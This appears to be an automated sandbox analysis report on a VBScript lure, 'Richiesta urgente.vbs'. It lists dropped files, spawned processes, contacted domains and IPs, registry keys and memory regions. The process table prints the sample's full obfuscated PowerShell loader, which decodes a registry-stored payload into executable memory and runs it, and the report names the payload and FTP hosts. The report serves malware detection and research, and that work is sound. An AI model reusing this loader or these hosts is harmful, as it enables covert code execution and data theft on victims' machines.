Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Richiesta urgente.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.0.cs
|
Unicode text, UTF-8 (with BOM) text, with very long lines (1303), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESA66C.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 28 19:06:44 2022,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_newj5tcw.yq1.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdv1nroa.nix.ps1
|
very short file (no magic)
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
CMD.EXE /c echo C:\Windows
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa
Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl
ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy
PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth
brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa
AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt
StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm
SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu
VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo
GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd
SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt
UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk
LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa
NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl
drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi
LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi
OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo
UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl
AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAgeNurSu3Ke2Ma`"""Fo)fl]DepdiuCibStlOuiSecBi
ScsHytBjalitFliDrcBl ToeCoxBytFoeGarRenPo SeitunMetDa UnGMoeprtHaKFoefoyNeSBotMuaGrtFeeSk(BaiVinSttNo SkFFooUnrGe)Di;lo[ByDPelTulMiIMimKapCooInrPutxe(Un`"""RegCydWoiDo3Me2Us`"""St)Be]KopMauHybBolEdiLvcRe
SksDatFlaTitdaiChcDr EneMexFetTaeTorWenKl BriErnThtRe LaPAloPelGiySoTBueCrxSetDiOInuBetKo(VeiNanEmtRe UfFFoeSpeSidInsSttSt,YoiPanBltLe
ElFOblSpoUrrKieFu,NeiEtnEltPs TrLRaiBemAn)Be;Br[UbDArlMylStIismStpAcoHerLytHe(vl`"""SuuUnsPreAfrhj3Kr2Pr`"""Un)Un]IspPauSrbPalSmicocma
FrsretBoaSttBeiancPr OweBoxKotFaeUrrSnnSu FriStnUntma AnESaxUrcTrlliuPrdBrePsUBepTodDoaUntArePoRAugMonBy(DeiKlnHatVa PaUMunAbdPr1Ba3Ti7Le,UniSknAntSk
UnKSonUniUnrPo)Ni;Sk[MiDaslEklStIUnmRkptroCarUntEl(Kr`"""TikCueDyrVanBreIdlUn3Bo2Di`"""po)Su]IdpenudrbTmlOpiGrcfl MesMatKhaDotDiiSycAs
LaeOvxRetUreGrrUsnst OuivinPetBe KoSAreXatFrCMioAinFlsLooUnlOpeTeMOdoLodGoecr(sciMunsutCh LvCYdrKoaChvVeaUntTa,iniApnlstNs
RuSGovgrmKumKr)Th;Pa[ElDDilStlviISamTepKooAfrFotMa(la`"""SikAeeDdrafnToeSnlCa3Ob2Ag`"""St)he]TepInuStbFolPeiPrcan PosphtSyaudtSoiDecBl
OueSaxNotNoeBerLanPo TeIVanSatRePPrtLarBl LaEArnSyuTrmnoSReyDesSktRaeKlmBlLPaoTecImaUtlAneDisPeWMe(KauLyiDenOvttn CrvAc1Cu,SjilonAmtOy
SavKa2St)Ti;Be}Ti'De;br`$PrRReeSkaEmbRerPhiSvdKogKueUrdYo3Ts=Ba[FyRtieMaaNobSmrHoiLidUdgBieReddr1Id]Co:Af:GlVBriExrMetFouInaImlReAGrllalAkoKocDi(Un0Ud,No1In0Pa4Ef8at5Ca7Ta6ul,Ch1ud2Ha2Ha8Ud8Be,Bo6Ve4Sy)do;Sc`$FeHPaeDraFjdStbEiaOmnaldFosCr=Tv(KvGRoeSjtTu-siIKrtAbeApmSaPParEkoLypsoeChrUdtHeySt
Fl-ToPgraPotSnhBi Ge'UnHToKDaCSaUAf:Al\FlAApnCotTaaPrrRi\OvHmiaSlnBadBrlGniKonUdgPrsGo'un)Mi.TiDHjeortOseWokGrtBreAlrCaiPinFygFoeGurEsnAdeKksLo;Un`$BoTRewReihenReeTh
Kr=Ls Ov[MeSVeyOpsVetAzeMymAu.OmCThoAgnPivSwelarTotEl]Ne:Vg:ReFserMeoismInBEraTrsDeeAb6Po4SpSRetacrLeiinnDegPa(Ra`$ClHBeeVoaBodUnbBeaPonBedDisLo)Le;Ti[UnSTryOfsPatCleShmRe.SeRReuMinSttFoiAemCueEl.TrITunBhtEveErrProKopTrSNyeRergevLeiPhcKrePhsEd.seMSuaFirunsPrhAaaDelSo]Ej:Pr:WrCReoHypDeyGr(Ho`$AgTRewFoidinTaeSt,Fo
Ca0Sc,Wi Th Ca`$EkRCyePoaQubdirPsividOpgRaeDadOs3do,Ku Ga`$MiTMawUniefnBreFo.TrcRvoFiuRanbytSp)Su;Pa[afRFoeJuaRebChrUniPldmngIneSedCo1lo]Tu:Af:NyEIcnBluRemGuSOsyCesPrtDieDimItLProBicToaDalSaeHasTrWDe(Fi`$SoRIneFoaGabEjrKeiPodRegSieTodSa3lu,Is
Eg0fe)pi#Vo;""";Function Reabridged4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Regionplanarbejderne
= $Regionplanarbejderne + $HS.Substring($i, 1); } $Regionplanarbejderne;}$Enterprise0 = Reabridged4 'GrITyEDoXLy ';$Enterprise1=
Reabridged4 $Skolegaardene;&$Enterprise0 $Enterprise1;;
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp"
"c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ftp://ftp.mcmprint.netnoffice
|
unknown
|
|
|
|
http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi
|
162.240.62.179
|
||
|
http://127.0.0.1:HTTP/1.1
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
http://3LpbHlMRrrHdHc2KU.net
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
|
unknown
|
||
|
http://DynDns.comDynDNSnamejidpasswordPsi/Psi
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://OowQOv.com
|
unknown
|
||
|
http://crl.micr
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
qwedft.gq
|
162.240.62.179
|
||
|
ftp.mcmprint.net
|
185.31.121.136
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
162.240.62.179
|
qwedft.gq
|
United States
|
||
|
185.31.121.136
|
ftp.mcmprint.net
|
Bulgaria
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\Antar\Handlings
|
Detekteringernes
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1DB51000
|
trusted library allocation
|
page read and write
|
|
|
|
6CF0000
|
direct allocation
|
page execute and read and write
|
|
|
|
1350000
|
remote allocation
|
page execute and read and write
|
|
|
|
185E34A1000
|
heap
|
page read and write
|
||
|
82C0000
|
trusted library allocation
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
185E34A1000
|
heap
|
page read and write
|
||
|
6BF0000
|
trusted library allocation
|
page read and write
|
||
|
7010000
|
trusted library allocation
|
page read and write
|
||
|
8290000
|
trusted library allocation
|
page read and write
|
||
|
7000000
|
trusted library allocation
|
page read and write
|
||
|
7010000
|
trusted library allocation
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
185E344A000
|
heap
|
page read and write
|
||
|
7ED0000
|
trusted library allocation
|
page read and write
|
||
|
7A18000
|
unkown
|
page read and write
|
||
|
185E34A1000
|
heap
|
page read and write
|
||
|
B5E000
|
stack
|
page read and write
|
||
|
7000000
|
trusted library allocation
|
page read and write
|
||
|
1621000
|
heap
|
page read and write
|
||
|
7F00000
|
trusted library allocation
|
page read and write
|